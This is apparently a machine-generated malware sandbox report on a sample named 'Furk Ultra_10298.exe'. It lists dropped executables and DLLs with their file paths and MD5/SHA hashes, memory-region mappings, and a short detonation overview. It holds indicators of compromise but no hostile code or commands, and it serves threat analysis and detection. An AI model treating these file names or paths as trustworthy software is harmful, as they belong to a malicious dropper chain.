SHA256 8dc562cda7217a3a52db898243de3e2ed68b80e62ddcb8619545ed0b4e7f65a8
SHA512 531d6328daf3b86d85556016d299798fa06fefc81604185108a342d000e203094c8c12226a12bd6e1f89b0db501fb66f827b610d460b933bd4ab936ac2fd8a88

\Users\Admin\AppData\Local\Temp\Ft8isKJ5\zI9VJZP2WFNnHYj20.exe

MD5 c6f806e7f38f2f55f6b2e2d31b53564b
SHA1 02c96f6212a5f414199a503bfb3bb9010f2346a5
SHA256 e60c013bf4be1df9fee388bade8d42fd6901182a5edf3d3d08b0f02c5770def7
SHA512 55262f9ac89391710efb217fe76ebb47d3240902f7c4d5f622dd8fba1417f240dfdb0b250beee5316cbe898858d93ef11e5c05e4e0858a94d6d9cdaf008ea28f

\Users\Admin\AppData\Local\Temp\FaIOXtKt\EdL8iSHGnMSs6MTcpU.exe

MD5 16ad463bc69dc5e2580ddc855b9f10b0
SHA1 2639d11cece15244c647964f3b515cc7b3d429f0
SHA256 a6c691a303ca0876e2841587979c48a6d54e65f287264a9ac857efbd2720100e
SHA512 d6141e0ce5e4b30855472e740d1ec8cc577e6766b2e2eb1ce9b9a8eeef89456e62bf9603339c13cfe46a004dc1a35bf2bb47ea74849de82613f2f5bb1d16bb5e

C:\Users\Admin\AppData\Local\Temp\FaIOXtKt\EdL8iSHGnMSs6MTcpU.exe

MD5 16ad463bc69dc5e2580ddc855b9f10b0
SHA1 2639d11cece15244c647964f3b515cc7b3d429f0
SHA256 a6c691a303ca0876e2841587979c48a6d54e65f287264a9ac857efbd2720100e
SHA512 d6141e0ce5e4b30855472e740d1ec8cc577e6766b2e2eb1ce9b9a8eeef89456e62bf9603339c13cfe46a004dc1a35bf2bb47ea74849de82613f2f5bb1d16bb5e

C:\Users\Admin\AppData\Local\Temp\4ptT0ZuA\0tvdpzuB9yWiq1On.exe

MD5 7731cf5b42c4e5a7bf5859240bbcabd9
SHA1 881ecf093dd8241b664cfc7521a9351dc8d9cf7c
SHA256 a3f18ccd375dc30af943b517597e4e7f7ed668aa6f711b807891d7225d11bd10
SHA512 cc1b3a89706660d4fa616243facfd682456a0e875d82d1ac62b8805f35bde672463e89fad0ffe77bbe915884e2e24511de9688b74097551e1e9b54d421fe3281

memory/900-94-0x0000000000000000-mapping.dmp

\Users\Admin\AppData\Local\Temp\4ptT0ZuA\0tvdpzuB9yWiq1On.exe

MD5 7731cf5b42c4e5a7bf5859240bbcabd9
SHA1 881ecf093dd8241b664cfc7521a9351dc8d9cf7c
SHA256 a3f18ccd375dc30af943b517597e4e7f7ed668aa6f711b807891d7225d11bd10
SHA512 cc1b3a89706660d4fa616243facfd682456a0e875d82d1ac62b8805f35bde672463e89fad0ffe77bbe915884e2e24511de9688b74097551e1e9b54d421fe3281

memory/1476-107-0x0000000006450000-0x000000000720D000-memory.dmp

memory/1952-108-0x0000000000400000-0x00000000011BD000-memory.dmp

\Users\Admin\AppData\Local\Temp\qf9qIpd3\5ByuM.exe

MD5 c11030bd1b9b76d5371f5d3e42d7620f
SHA1 20eac9ec20130b18a07eb883172afcedf39ba350
SHA256 a65b6626714168ad401984f586998df6d5d256ae6d93629b1cc92e888ad33780
SHA512 69f6bbf6b8f27ac62746a4abd469ab17659c6d19ab6de76278f391a8f094cfc77a9a2f8b163b0a6d179fbdf8eb956c4d01435dc15256fc6c01941bd351e6f020

memory/1996-111-0x0000000000000000-mapping.dmp

\Users\Admin\AppData\Local\Temp\qf9qIpd3\5ByuM.exe

MD5 c11030bd1b9b76d5371f5d3e42d7620f
SHA1 20eac9ec20130b18a07eb883172afcedf39ba350
SHA256 a65b6626714168ad401984f586998df6d5d256ae6d93629b1cc92e888ad33780
SHA512 69f6bbf6b8f27ac62746a4abd469ab17659c6d19ab6de76278f391a8f094cfc77a9a2f8b163b0a6d179fbdf8eb956c4d01435dc15256fc6c01941bd351e6f020

C:\Users\Admin\AppData\Local\Temp\qf9qIpd3\5ByuM.exe

MD5 c11030bd1b9b76d5371f5d3e42d7620f
SHA1 20eac9ec20130b18a07eb883172afcedf39ba350
SHA256 a65b6626714168ad401984f586998df6d5d256ae6d93629b1cc92e888ad33780
SHA512 69f6bbf6b8f27ac62746a4abd469ab17659c6d19ab6de76278f391a8f094cfc77a9a2f8b163b0a6d179fbdf8eb956c4d01435dc15256fc6c01941bd351e6f020

memory/1996-114-0x0000000035560000-0x0000000036560000-memory.dmp

memory/1596-117-0x0000000000000000-mapping.dmp

memory/1492-118-0x0000000000000000-mapping.dmp

memory/300-119-0x0000000000000000-mapping.dmp

memory/2020-121-0x0000000000000000-mapping.dmp

memory/796-120-0x0000000000000000-mapping.dmp

memory/1660-122-0x0000000000000000-mapping.dmp

memory/1588-124-0x0000000000000000-mapping.dmp

memory/1816-123-0x0000000000000000-mapping.dmp

memory/1952-125-0x0000000000400000-0x00000000011BD000-memory.dmp

memory/1952-126-0x0000000000400000-0x00000000011BD000-memory.dmp

memory/1952-127-0x0000000000400000-0x00000000011BD000-memory.dmp

\Users\Admin\AppData\Local\Temp\nsjCA35.tmp\liteFirewall.dll

MD5 165e1ef5c79475e8c33d19a870e672d4
SHA1 965f02bfd103f094ac6b3eef3abe7fdcb8d9e2a5
SHA256 9db9c58e44dff2d985dc078fdbb7498dcc66c4cc4eb12f68de6a98a5d665abbd
SHA512 cd10eaf0928e5df048bf0488d9dbfe9442e2e106396a0967462bef440bf0b528cdf3ab06024fb6fdaf9f247e2b7f3ca0cea78afc0ce6943650ef9d6c91fee52a

\Users\Admin\AppData\Roaming\InfoInstall\InfoInstall.exe

MD5 b3dba6728cf861a741a710442088683a
SHA1 bf3a57590117cae01c9911f82c69dbe71e5968db
SHA256 a9ada8996fc6ae710b6b74d1db7f1557cf5e52589872fdc6ed685e1e7e1acfa2
SHA512 7dba6cd1c6b24558055be15fbe88e7859487c4e8f07553123bc4089f31615b166321712f79d10ffa970f8c91851e7f07f0e4d0ba06141496c675172ee8a1f6d9

memory/1180-130-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Roaming\InfoInstall\InfoInstall.exe

MD5 b3dba6728cf861a741a710442088683a
SHA1 bf3a57590117cae01c9911f82c69dbe71e5968db
SHA256 a9ada8996fc6ae710b6b74d1db7f1557cf5e52589872fdc6ed685e1e7e1acfa2
SHA512 7dba6cd1c6b24558055be15fbe88e7859487c4e8f07553123bc4089f31615b166321712f79d10ffa970f8c91851e7f07f0e4d0ba06141496c675172ee8a1f6d9

C:\Users\Admin\AppData\Roaming\InfoInstall\InfoInstall.exe

MD5 b3dba6728cf861a741a710442088683a
SHA1 bf3a57590117cae01c9911f82c69dbe71e5968db
SHA256 a9ada8996fc6ae710b6b74d1db7f1557cf5e52589872fdc6ed685e1e7e1acfa2
SHA512 7dba6cd1c6b24558055be15fbe88e7859487c4e8f07553123bc4089f31615b166321712f79d10ffa970f8c91851e7f07f0e4d0ba06141496c675172ee8a1f6d9

\Users\Admin\AppData\Local\Temp\Uc0mQDyj\SCLt3f0W7iK6UwxVd.exe

MD5 cc21c45d87dc08784bdcd3c46ffdd400
SHA1 d63e755519c8cb45f84032a95bc77f91a39bc2c3
SHA256 1aa44b70218e3a392b631ffb6851a55c630fcfd7e5a26196a0a9dc1b09291feb
SHA512 f2d14152799b803d30bd339f14b475b58d3ee45157db308c360c683e647b4c616412875b10489c2bc5c1a4f7be3f9435137f2e6feef61f139fca0dfdcde6dced

\Users\Admin\AppData\Local\Temp\nsjCA35.tmp\INetC.dll

MD5 40d7eca32b2f4d29db98715dd45bfac5
SHA1 124df3f617f562e46095776454e1c0c7bb791cc7
SHA256 85e03805f90f72257dd41bfdaa186237218bbb0ec410ad3b6576a88ea11dccb9
SHA512 5fd4f516ce23fb7e705e150d5c1c93fc7133694ba495fb73101674a528883a013a34ab258083aa7ce6072973b067a605158316a4c9159c1b4d765761f91c513d

\Users\Admin\AppData\Local\Temp\nsjCA35.tmp\md5dll.dll

MD5 7059f133ea2316b9e7e39094a52a8c34
SHA1 ee9f1487c8152d8c42fecf2efb8ed1db68395802
SHA256 32c3d36f38e7e8a8bafd4a53663203ef24a10431bda16af9e353c7d5d108610f
SHA512 9115986754a74d3084dd18018e757d3b281a2c2fde48c73b71dba882e13bd9b2ded0e6e7f45dc5b019e6d53d086090ccb06e18e6efeec091f655a128510cbe51

\Users\Admin\AppData\Local\Temp\nsjCA35.tmp\nsProcess.dll

MD5 f0438a894f3a7e01a4aae8d1b5dd0289
SHA1 b058e3fcfb7b550041da16bf10d8837024c38bf6
SHA256 30c6c3dd3cc7fcea6e6081ce821adc7b2888542dae30bf00e881c0a105eb4d11
SHA512 f91fcea19cbddf8086affcb63fe599dc2b36351fc81ac144f58a80a524043ddeaa3943f36c86ebae45dd82e8faf622ea7b7c9b776e74c54b93df2963cfe66cc7

memory/828-134-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\Uc0mQDyj\SCLt3f0W7iK6UwxVd.exe

MD5 cc21c45d87dc08784bdcd3c46ffdd400
SHA1 d63e755519c8cb45f84032a95bc77f91a39bc2c3
SHA256 1aa44b70218e3a392b631ffb6851a55c630fcfd7e5a26196a0a9dc1b09291feb
SHA512 f2d14152799b803d30bd339f14b475b58d3ee45157db308c360c683e647b4c616412875b10489c2bc5c1a4f7be3f9435137f2e6feef61f139fca0dfdcde6dced

memory/828-140-0x0000000000400000-0x0000000000414000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\FaIOXtKt\EdL8iSHGnMSs6MTcpU.exe

MD5 16ad463bc69dc5e2580ddc855b9f10b0
SHA1 2639d11cece15244c647964f3b515cc7b3d429f0
SHA256 a6c691a303ca0876e2841587979c48a6d54e65f287264a9ac857efbd2720100e
SHA512 d6141e0ce5e4b30855472e740d1ec8cc577e6766b2e2eb1ce9b9a8eeef89456e62bf9603339c13cfe46a004dc1a35bf2bb47ea74849de82613f2f5bb1d16bb5e

C:\Users\Admin\AppData\Local\Temp\Uc0mQDyj\SCLt3f0W7iK6UwxVd.exe

MD5 cc21c45d87dc08784bdcd3c46ffdd400
SHA1 d63e755519c8cb45f84032a95bc77f91a39bc2c3
SHA256 1aa44b70218e3a392b631ffb6851a55c630fcfd7e5a26196a0a9dc1b09291feb
SHA512 f2d14152799b803d30bd339f14b475b58d3ee45157db308c360c683e647b4c616412875b10489c2bc5c1a4f7be3f9435137f2e6feef61f139fca0dfdcde6dced

memory/300-146-0x0000000000000000-mapping.dmp

\Users\Admin\AppData\Local\Temp\is-R730P.tmp\SCLt3f0W7iK6UwxVd.tmp

MD5 e3dcae5ee7ee62e603d2a37128861468
SHA1 c68f71703f544ec31d1670c09a597c06c827fb46
SHA256 b1aa9fab8bd7c68246c60587cda7709166be3c1af95e17eeda73722ad08c0e8d
SHA512 f21cd0348762fd711c8de4cf56c98f7d9517856ed1f4f00f9ce62740bd26ee64943f5752132b459476dfa05a777fa2f5f5a5bd4dbfff0456a13b059642fe4d1c

\Users\Admin\AppData\Local\Temp\is-S2V10.tmp\EdL8iSHGnMSs6MTcpU.tmp

MD5 e3dcae5ee7ee62e603d2a37128861468
SHA1 c68f71703f544ec31d1670c09a597c06c827fb46
SHA256 b1aa9fab8bd7c68246c60587cda7709166be3c1af95e17eeda73722ad08c0e8d
SHA512 f21cd0348762fd711c8de4cf56c98f7d9517856ed1f4f00f9ce62740bd26ee64943f5752132b459476dfa05a777fa2f5f5a5bd4dbfff0456a13b059642fe4d1c

C:\Users\Admin\AppData\Local\Temp\is-S2V10.tmp\EdL8iSHGnMSs6MTcpU.tmp

MD5 e3dcae5ee7ee62e603d2a37128861468
SHA1 c68f71703f544ec31d1670c09a597c06c827fb46
SHA256 b1aa9fab8bd7c68246c60587cda7709166be3c1af95e17eeda73722ad08c0e8d
SHA512 f21cd0348762fd711c8de4cf56c98f7d9517856ed1f4f00f9ce62740bd26ee64943f5752132b459476dfa05a777fa2f5f5a5bd4dbfff0456a13b059642fe4d1c

memory/1872-149-0x0000000000000000-mapping.dmp

memory/1180-148-0x0000000000E10000-0x0000000000E64000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\is-R730P.tmp\SCLt3f0W7iK6UwxVd.tmp

MD5 e3dcae5ee7ee62e603d2a37128861468
SHA1 c68f71703f544ec31d1670c09a597c06c827fb46
SHA256 b1aa9fab8bd7c68246c60587cda7709166be3c1af95e17eeda73722ad08c0e8d
SHA512 f21cd0348762fd711c8de4cf56c98f7d9517856ed1f4f00f9ce62740bd26ee64943f5752132b459476dfa05a777fa2f5f5a5bd4dbfff0456a13b059642fe4d1c

memory/1820-152-0x0000000000000000-mapping.dmp

\Users\Admin\AppData\Local\Temp\is-O1KG5.tmp\_isetup\_shfoldr.dll

MD5 92dc6ef532fbb4a5c3201469a5b5eb63
SHA1 3e89ff837147c16b4e41c30d6c796374e0b8e62c
SHA256 9884e9d1b4f8a873ccbd81f8ad0ae257776d2348d027d811a56475e028360d87
SHA512 9908e573921d5dbc3454a1c0a6c969ab8a81cc2e8b5385391d46b1a738fb06a76aa3282e0e58d0d2ffa6f27c85668cd5178e1500b8a39b1bbae04366ae6a86d3

\Users\Admin\AppData\Local\Temp\is-O1KG5.tmp\_isetup\_shfoldr.dll

MD5 92dc6ef532fbb4a5c3201469a5b5eb63
SHA1 3e89ff837147c16b4e41c30d6c796374e0b8e62c
SHA256 9884e9d1b4f8a873ccbd81f8ad0ae257776d2348d027d811a56475e028360d87
SHA512 9908e573921d5dbc3454a1c0a6c969ab8a81cc2e8b5385391d46b1a738fb06a76aa3282e0e58d0d2ffa6f27c85668cd5178e1500b8a39b1bbae04366ae6a86d3

\Users\Admin\AppData\Local\Temp\is-O1KG5.tmp\_isetup\_iscrypt.dll

MD5 a69559718ab506675e907fe49deb71e9
SHA1 bc8f404ffdb1960b50c12ff9413c893b56f2e36f
SHA256 2f6294f9aa09f59a574b5dcd33be54e16b39377984f3d5658cda44950fa0f8fc
SHA512 e52e0aa7fe3f79e36330c455d944653d449ba05b2f9abee0914a0910c3452cfa679a40441f9ac696b3ccf9445cbb85095747e86153402fc362bb30ac08249a63

C:\Users\Admin\AppData\Local\Temp\is-S2V10.tmp\EdL8iSHGnMSs6MTcpU.tmp

MD5 e3dcae5ee7ee62e603d2a37128861468
SHA1 c68f71703f544ec31d1670c09a597c06c827fb46
SHA256 b1aa9fab8bd7c68246c60587cda7709166be3c1af95e17eeda73722ad08c0e8d
SHA512 f21cd0348762fd711c8de4cf56c98f7d9517856ed1f4f00f9ce62740bd26ee64943f5752132b459476dfa05a777fa2f5f5a5bd4dbfff0456a13b059642fe4d1c

\Users\Admin\AppData\Local\Temp\is-67OBN.tmp\_isetup\_iscrypt.dll

MD5 a69559718ab506675e907fe49deb71e9
SHA1 bc8f404ffdb1960b50c12ff9413c893b56f2e36f
SHA256 2f6294f9aa09f59a574b5dcd33be54e16b39377984f3d5658cda44950fa0f8fc
SHA512 e52e0aa7fe3f79e36330c455d944653d449ba05b2f9abee0914a0910c3452cfa679a40441f9ac696b3ccf9445cbb85095747e86153402fc362bb30ac08249a63

\Users\Admin\AppData\Local\Temp\is-67OBN.tmp\_isetup\_shfoldr.dll

MD5 92dc6ef532fbb4a5c3201469a5b5eb63
SHA1 3e89ff837147c16b4e41c30d6c796374e0b8e62c
SHA256 9884e9d1b4f8a873ccbd81f8ad0ae257776d2348d027d811a56475e028360d87
SHA512 9908e573921d5dbc3454a1c0a6c969ab8a81cc2e8b5385391d46b1a738fb06a76aa3282e0e58d0d2ffa6f27c85668cd5178e1500b8a39b1bbae04366ae6a86d3

\Users\Admin\AppData\Local\Temp\is-67OBN.tmp\_isetup\_shfoldr.dll

MD5 92dc6ef532fbb4a5c3201469a5b5eb63
SHA1 3e89ff837147c16b4e41c30d6c796374e0b8e62c
SHA256 9884e9d1b4f8a873ccbd81f8ad0ae257776d2348d027d811a56475e028360d87
SHA512 9908e573921d5dbc3454a1c0a6c969ab8a81cc2e8b5385391d46b1a738fb06a76aa3282e0e58d0d2ffa6f27c85668cd5178e1500b8a39b1bbae04366ae6a86d3

C:\Users\Admin\AppData\Local\Temp\is-R730P.tmp\SCLt3f0W7iK6UwxVd.tmp

MD5 e3dcae5ee7ee62e603d2a37128861468
SHA1 c68f71703f544ec31d1670c09a597c06c827fb46
SHA256 b1aa9fab8bd7c68246c60587cda7709166be3c1af95e17eeda73722ad08c0e8d
SHA512 f21cd0348762fd711c8de4cf56c98f7d9517856ed1f4f00f9ce62740bd26ee64943f5752132b459476dfa05a777fa2f5f5a5bd4dbfff0456a13b059642fe4d1c

memory/828-164-0x0000000000400000-0x0000000000414000-memory.dmp

memory/1500-163-0x0000000000000000-mapping.dmp

memory/1664-166-0x0000000000000000-mapping.dmp

C:\Program Files (x86)\ScanRename\ScanRename.exe

MD5 21d5953226e85aacd484598f2e5107e6
SHA1 f6b043191ba9cdf8211740e7638c1dc592a4e393
SHA256 689e374732a99e7c78df62c317da2950bb16021988ddaea96fad4f4aaf944748
SHA512 6b7ec0dc92c6fb3ca05c8ffe3c077ac1eff10daa7c77a5ac19cafc5a1f96f30e9ad6f4b0a3816160a7369ae8745e4e024d7b40248c450ed8afa24fac461c662f

\Program Files (x86)\ScanRename\ScanRename.exe

MD5 21d5953226e85aacd484598f2e5107e6
SHA1 f6b043191ba9cdf8211740e7638c1dc592a4e393
SHA256 689e374732a99e7c78df62c317da2950bb16021988ddaea96fad4f4aaf944748
SHA512 6b7ec0dc92c6fb3ca05c8ffe3c077ac1eff10daa7c77a5ac19cafc5a1f96f30e9ad6f4b0a3816160a7369ae8745e4e024d7b40248c450ed8afa24fac461c662f

memory/1080-170-0x0000000000000000-mapping.dmp

\Program Files (x86)\Any Drive Formatter\Any Drive Format.exe

MD5 262bacb5f63eb9daf62c1c4ab2a20318
SHA1 bf196ed1fd658c32b4152c7f8b3f6af5af748a03
SHA256 1d2019b69f9a5f4688172a676a01e1078e8903626b36ccd8dd329ee928b17cb8
SHA512 5a0598e2e473b5bcaa9de1fc23a2f20a4861a854f23862bbdde077835927b676000877fd9af0092d0f885c969590db62d37a352eaab958fa22b2cd57484098a8

C:\Program Files (x86)\Any Drive Formatter\Any Drive Format.exe

MD5 262bacb5f63eb9daf62c1c4ab2a20318
SHA1 bf196ed1fd658c32b4152c7f8b3f6af5af748a03
SHA256 1d2019b69f9a5f4688172a676a01e1078e8903626b36ccd8dd329ee928b17cb8
SHA512 5a0598e2e473b5bcaa9de1fc23a2f20a4861a854f23862bbdde077835927b676000877fd9af0092d0f885c969590db62d37a352eaab958fa22b2cd57484098a8

\Program Files (x86)\Any Drive Formatter\sqlite3.dll

MD5 e477a96c8f2b18d6b5c27bde49c990bf
SHA1 e980c9bf41330d1e5bd04556db4646a0210f7409
SHA256 16574f51785b0e2fc29c2c61477eb47bb39f714829999511dc8952b43ab17660
SHA512 335a86268e7c0e568b1c30981ec644e6cd332e66f96d2551b58a82515316693c1859d87b4f4b7310cf1ac386cee671580fdd999c3bcb23acf2c2282c01c8798c

C:\Program Files (x86)\Any Drive Formatter\sqlite3.dll

MD5 e477a96c8f2b18d6b5c27bde49c990bf
SHA1 e980c9bf41330d1e5bd04556db4646a0210f7409
SHA256 16574f51785b0e2fc29c2c61477eb47bb39f714829999511dc8952b43ab17660
SHA512 335a86268e7c0e568b1c30981ec644e6cd332e66f96d2551b58a82515316693c1859d87b4f4b7310cf1ac386cee671580fdd999c3bcb23acf2c2282c01c8798c

memory/820-175-0x0000000000000000-mapping.dmp

memory/1476-176-0x0000000006450000-0x000000000720D000-memory.dmp

memory/1924-177-0x0000000000400000-0x0000000000414000-memory.dmp

memory/300-178-0x00000000035D0000-0x0000000004597000-memory.dmp

memory/1664-179-0x0000000000400000-0x00000000013C7000-memory.dmp

memory/1872-180-0x0000000003620000-0x0000000004738000-memory.dmp

memory/1080-181-0x0000000000400000-0x0000000001518000-memory.dmp

memory/2008-182-0x0000000000050000-0x00000000000B4000-memory.dmp

memory/2016-183-0x0000000000000000-mapping.dmp

memory/1664-184-0x0000000000400000-0x00000000013C7000-memory.dmp

memory/1664-185-0x0000000000400000-0x00000000013C7000-memory.dmp

memory/1080-186-0x0000000000400000-0x0000000001518000-memory.dmp

memory/1080-187-0x0000000000400000-0x0000000001518000-memory.dmp

C:\Program Files (x86)\Any Drive Formatter\Any Drive Format.exe

MD5 262bacb5f63eb9daf62c1c4ab2a20318
SHA1 bf196ed1fd658c32b4152c7f8b3f6af5af748a03
SHA256 1d2019b69f9a5f4688172a676a01e1078e8903626b36ccd8dd329ee928b17cb8
SHA512 5a0598e2e473b5bcaa9de1fc23a2f20a4861a854f23862bbdde077835927b676000877fd9af0092d0f885c969590db62d37a352eaab958fa22b2cd57484098a8

memory/676-189-0x0000000000000000-mapping.dmp

memory/1080-191-0x0000000000400000-0x0000000001518000-memory.dmp

memory/1664-192-0x0000000000400000-0x00000000013C7000-memory.dmp

memory/1752-193-0x0000000000000000-mapping.dmp

memory/828-194-0x0000000000400000-0x0000000000414000-memory.dmp

memory/1180-196-0x000000001B420000-0x000000001B4B2000-memory.dmp

C:\Users\Admin\AppData\Roaming\InfoInstall\Newtonsoft.Json.dll

MD5 486015a44a273c6c554a27b3d498365c
SHA1 cb08f5d7240dfcdcd77de754259b36c0d9a2a034
SHA256 6a168461c721fd14163751f7839fb8d67483cb5831f1b2b1ab3e96a68b82d384
SHA512 1578ed43e815017c269d2a37bb9cdc16d51209bfa6bdb7276ad67cbb39955708826973ac7f48c795e6a1361e7d2a14b14b6cea02ee9ecf396a4b02313aada1d6

C:\Users\Admin\AppData\Roaming\InfoInstall\FileOperation.dll

MD5 e5d09907a04a7b97500654d71dd3b110
SHA1 445c074d92489b85047434ca6938d583c4ca33e8
SHA256 33b35e980bf35baaf23ee36e61ae2a758c6627e83e6ca447e67da85ca1062a94
SHA512 0cb70775859769be9a536c78abb8a728f2af554369397c8e252de566c05e15037ab4ee105e692915619799327e75609ee673866a353e3fff3dafb0d1f668ed37

memory/1924-197-0x0000000000400000-0x0000000000414000-memory.dmp

memory/1180-199-0x00000000001E0000-0x00000000001E8000-memory.dmp

C:\Program Files (x86)\ScanRename\ScanRename.exe

MD5 21d5953226e85aacd484598f2e5107e6
SHA1 f6b043191ba9cdf8211740e7638c1dc592a4e393
SHA256 689e374732a99e7c78df62c317da2950bb16021988ddaea96fad4f4aaf944748
SHA512 6b7ec0dc92c6fb3ca05c8ffe3c077ac1eff10daa7c77a5ac19cafc5a1f96f30e9ad6f4b0a3816160a7369ae8745e4e024d7b40248c450ed8afa24fac461c662f

memory/1180-201-0x0000000000416000-0x0000000000435000-memory.dmp

memory/1180-202-0x00000000001F0000-0x00000000001FA000-memory.dmp

memory/2016-203-0x000007FEFC4E1000-0x000007FEFC4E3000-memory.dmp

memory/1100-204-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\qf9qIpd3\5ByuM.exe

MD5 c11030bd1b9b76d5371f5d3e42d7620f
SHA1 20eac9ec20130b18a07eb883172afcedf39ba350
SHA256 a65b6626714168ad401984f586998df6d5d256ae6d93629b1cc92e888ad33780
SHA512 69f6bbf6b8f27ac62746a4abd469ab17659c6d19ab6de76278f391a8f094cfc77a9a2f8b163b0a6d179fbdf8eb956c4d01435dc15256fc6c01941bd351e6f020

memory/1244-206-0x0000000000000000-mapping.dmp

memory/1920-209-0x000000000C340000-0x000000000C496000-memory.dmp

memory/1104-210-0x0000000000000000-mapping.dmp

memory/1920-211-0x00000000008D0000-0x0000000000A2B000-memory.dmp

memory/1920-212-0x000000000C340000-0x000000000C496000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\UwoKNgjfMpAQohzjy\vZixTOWAjXczfOR\DOgvvll.exe

MD5 c11030bd1b9b76d5371f5d3e42d7620f
SHA1 20eac9ec20130b18a07eb883172afcedf39ba350
SHA256 a65b6626714168ad401984f586998df6d5d256ae6d93629b1cc92e888ad33780
SHA512 69f6bbf6b8f27ac62746a4abd469ab17659c6d19ab6de76278f391a8f094cfc77a9a2f8b163b0a6d179fbdf8eb956c4d01435dc15256fc6c01941bd351e6f020

memory/2012-214-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\UwoKNgjfMpAQohzjy\vZixTOWAjXczfOR\DOgvvll.exe

MD5 c11030bd1b9b76d5371f5d3e42d7620f
SHA1 20eac9ec20130b18a07eb883172afcedf39ba350
SHA256 a65b6626714168ad401984f586998df6d5d256ae6d93629b1cc92e888ad33780
SHA512 69f6bbf6b8f27ac62746a4abd469ab17659c6d19ab6de76278f391a8f094cfc77a9a2f8b163b0a6d179fbdf8eb956c4d01435dc15256fc6c01941bd351e6f020

memory/2012-217-0x00000000340E0000-0x00000000350E0000-memory.dmp

C:\Windows\system32\GroupPolicy\gpt.ini

MD5 a62ce44a33f1c05fc2d340ea0ca118a4
SHA1 1f03eb4716015528f3de7f7674532c1345b2717d
SHA256 9f2cd4acf23d565bc8498c989fccccf59fd207ef8925111dc63e78649735404a
SHA512 9d9a4da2df0550afdb7b80be22c6f4ef7da5a52cc2bb4831b8ff6f30f0ee9eac8960f61cdd7cfe0b1b6534a0f9e738f7eb8ea3839d2d92abeb81660de76e7732

memory/1180-222-0x00000000001F0000-0x00000000001FA000-memory.dmp

memory/1852-221-0x0000000000000000-mapping.dmp

memory/1372-223-0x0000000000000000-mapping.dmp

memory/516-224-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\Ft8isKJ5\zI9VJZP2WFNnHYj20.exe

MD5 c6f806e7f38f2f55f6b2e2d31b53564b
SHA1 02c96f6212a5f414199a503bfb3bb9010f2346a5
SHA256 e60c013bf4be1df9fee388bade8d42fd6901182a5edf3d3d08b0f02c5770def7
SHA512 55262f9ac89391710efb217fe76ebb47d3240902f7c4d5f622dd8fba1417f240dfdb0b250beee5316cbe898858d93ef11e5c05e4e0858a94d6d9cdaf008ea28f

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5 91683d2e59257ebb56a11f6cb5167242
SHA1 800d8811265e5bce41b3f52523520bd011d1095f
SHA256 c7ec15e2be3668493eb19ab0e6ca280482df84fea1d7d34b20b7c0d92b8078ec
SHA512 3daf001fac0a966a78d764159610ea23b3e9175b9d51e2ff71667498509f8f15cab2b65eeaf2ce67f9c7ab04b7cb98ee67c67f439d7088cf13d770ea3619ed45

memory/1920-228-0x00000000008D0000-0x0000000000A2B000-memory.dmp

memory/2016-230-0x000007FEE9D90000-0x000007FEEA7B3000-memory.dmp

memory/516-229-0x000007FEE9D90000-0x000007FEEA7B3000-memory.dmp

memory/2016-231-0x0000000002334000-0x0000000002337000-memory.dmp

memory/516-232-0x0000000002844000-0x0000000002847000-memory.dmp

memory/516-233-0x000007FEE9170000-0x000007FEE9CCD000-memory.dmp

memory/2016-234-0x000007FEE9170000-0x000007FEE9CCD000-memory.dmp

memory/1920-235-0x0000000000000000-mapping.dmp

memory/792-236-0x0000000000000000-mapping.dmp

memory/1772-237-0x0000000000000000-mapping.dmp

memory/552-238-0x0000000000000000-mapping.dmp

memory/1492-239-0x0000000000000000-mapping.dmp

memory/1104-240-0x0000000000000000-mapping.dmp

memory/1852-241-0x0000000000000000-mapping.dmp

memory/1240-242-0x0000000000000000-mapping.dmp

memory/1240-244-0x000007FEE9D90000-0x000007FEEA7B3000-memory.dmp

memory/1240-245-0x000007FEE9170000-0x000007FEE9CCD000-memory.dmp

memory/1240-246-0x0000000002AB4000-0x0000000002AB7000-memory.dmp

memory/2016-247-0x0000000002334000-0x0000000002337000-memory.dmp

memory/516-248-0x0000000002844000-0x0000000002847000-memory.dmp

memory/1240-249-0x0000000002AB4000-0x0000000002AB7000-memory.dmp

memory/1980-250-0x0000000000000000-mapping.dmp

memory/1776-251-0x0000000000000000-mapping.dmp

memory/1604-252-0x0000000000000000-mapping.dmp

memory/1620-253-0x0000000000000000-mapping.dmp

memory/1944-254-0x0000000000000000-mapping.dmp

memory/1936-255-0x0000000000000000-mapping.dmp

memory/1076-256-0x0000000000000000-mapping.dmp

memory/1604-257-0x0000000000000000-mapping.dmp

memory/1112-258-0x0000000000000000-mapping.dmp

memory/1944-259-0x0000000000000000-mapping.dmp

memory/1980-260-0x0000000000000000-mapping.dmp

memory/1112-262-0x0000000000000000-mapping.dmp

memory/1960-263-0x0000000000000000-mapping.dmp

memory/1688-264-0x0000000000000000-mapping.dmp

memory/2076-265-0x0000000000000000-mapping.dmp

memory/2100-266-0x0000000000000000-mapping.dmp

memory/2132-267-0x0000000000000000-mapping.dmp

memory/2156-268-0x0000000000000000-mapping.dmp

memory/2196-269-0x0000000000000000-mapping.dmp

memory/2232-270-0x0000000000000000-mapping.dmp

memory/2960-272-0x000007FEE9D90000-0x000007FEEA7B3000-memory.dmp

memory/2960-273-0x000007FEE9170000-0x000007FEE9CCD000-memory.dmp

memory/2960-274-0x00000000026F4000-0x00000000026F7000-memory.dmp

memory/2960-275-0x00000000026F4000-0x00000000026F7000-memory.dmp

memory/2112-278-0x00000000343E0000-0x00000000353E0000-memory.dmp

memory/2112-284-0x0000000048950000-0x00000000489D5000-memory.dmp

Analysis: behavioral1

Detonation Overview

Submitted

2023-01-15 17:11

Reported

2023-01-15 17:16

Platform

win7-20221111-en

Max time kernel

107s

Max time network

139s

Command Line

"C:\Users\Admin\AppData\Local\Temp\infected\Furk Ultra_10298.exe"

Signatures

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\infected\Furk Ultra_10298.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\setup10298.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS8126C44C\GenericSetup.exe N/A
